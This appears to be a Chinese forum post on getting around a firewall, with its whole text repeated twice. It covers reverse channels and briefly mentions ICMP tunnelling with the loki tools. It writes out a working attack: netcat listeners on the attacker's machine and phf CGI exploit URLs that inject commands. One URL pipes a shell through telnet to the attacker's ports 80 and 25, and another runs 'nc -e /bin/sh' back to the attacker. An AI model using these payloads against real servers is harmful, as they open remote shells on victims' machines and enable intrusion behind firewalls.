1:反向通道技术
比如说一台为于firewall之后的服务器A(ip:ipA),我的机子为B(ip:ipB)。
firewall只允许到来的数据包到达A的80和25端口,其他
一切拒绝。
现在先在自己的机子上执行
[sztcww@haha sztcww]# nc -l -n -v -p 80
[sztcww@haha sztcww]# nc -l -n -v -p 25
假如在A的机子上找到这个phf漏洞(不过现在还能找到吗,呵呵,
所以只做参考用)。现在可以利用以下几个命令来得到一个真正的
SHELL(说它是真正的是因为phf的漏洞利用也可以称为一个SHELL了)。
/cgi-bin/phf?Qalias=x%0a/bin/telnet%20ipB%2080%20|%20/bin/sh%20|
%20/bin/telnet%20ipB%2025
相当于在A的机子上执行了
telnet ipB 80|sh|telnet ipB 25
这样就利用反向tlenet铲回一个shell.
为什么可以在B的机子上得到一个A的SHELL,如果不知道,请翻看一下
管道的作用。
如果在A的机子上可以找到nc的话,也可以这样。
在我B机子上:
[sztcww@haha sztcww]# nc -l -n -v -p 80
A上:
/cgi-bin/phf?Qalias=x%0a/bin/nc%20-e%20/bin/sh%20ipB%2080
因为连接是从firewall之后的A服务器发起的,所以一般是能够通信的。
2:隧道技术
一般是利用ICMP封装真正的数据,也有UDP等其他的协议可以利用。
一般如果firewall不block icmp的话,就可以利用icmp隧道技术
与一台firewall之后的受害机子通信,也就是说可以得到
firewall之后的受害机子的一个SHELL。
关于这个更详细的讨论请参考Phrack的p49-6
可利用的工具有loki和lokid
防火墙(firewall)没有真正的接触过,这些都是书上看来的,不要告我抄袭就好哈,呵
比如说一台为于firewall之后的服务器A(ip:ipA),我的机子为B(ip:ipB)。
firewall只允许到来的数据包到达A的80和25端口,其他
一切拒绝。
现在先在自己的机子上执行
[sztcww@haha sztcww]# nc -l -n -v -p 80
[sztcww@haha sztcww]# nc -l -n -v -p 25
假如在A的机子上找到这个phf漏洞(不过现在还能找到吗,呵呵,
所以只做参考用)。现在可以利用以下几个命令来得到一个真正的
SHELL(说它是真正的是因为phf的漏洞利用也可以称为一个SHELL了)。
/cgi-bin/phf?Qalias=x%0a/bin/telnet%20ipB%2080%20|%20/bin/sh%20|
%20/bin/telnet%20ipB%2025
相当于在A的机子上执行了
telnet ipB 80|sh|telnet ipB 25
这样就利用反向tlenet铲回一个shell.
为什么可以在B的机子上得到一个A的SHELL,如果不知道,请翻看一下
管道的作用。
如果在A的机子上可以找到nc的话,也可以这样。
在我B机子上:
[sztcww@haha sztcww]# nc -l -n -v -p 80
A上:
/cgi-bin/phf?Qalias=x%0a/bin/nc%20-e%20/bin/sh%20ipB%2080
因为连接是从firewall之后的A服务器发起的,所以一般是能够通信的。
2:隧道技术
一般是利用ICMP封装真正的数据,也有UDP等其他的协议可以利用。
一般如果firewall不block icmp的话,就可以利用icmp隧道技术
与一台firewall之后的受害机子通信,也就是说可以得到
firewall之后的受害机子的一个SHELL。
关于这个更详细的讨论请参考Phrack的p49-6
可利用的工具有loki和lokid
防火墙(firewall)没有真正的接触过,这些都是书上看来的,不要告我抄袭就好哈,呵
3671
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
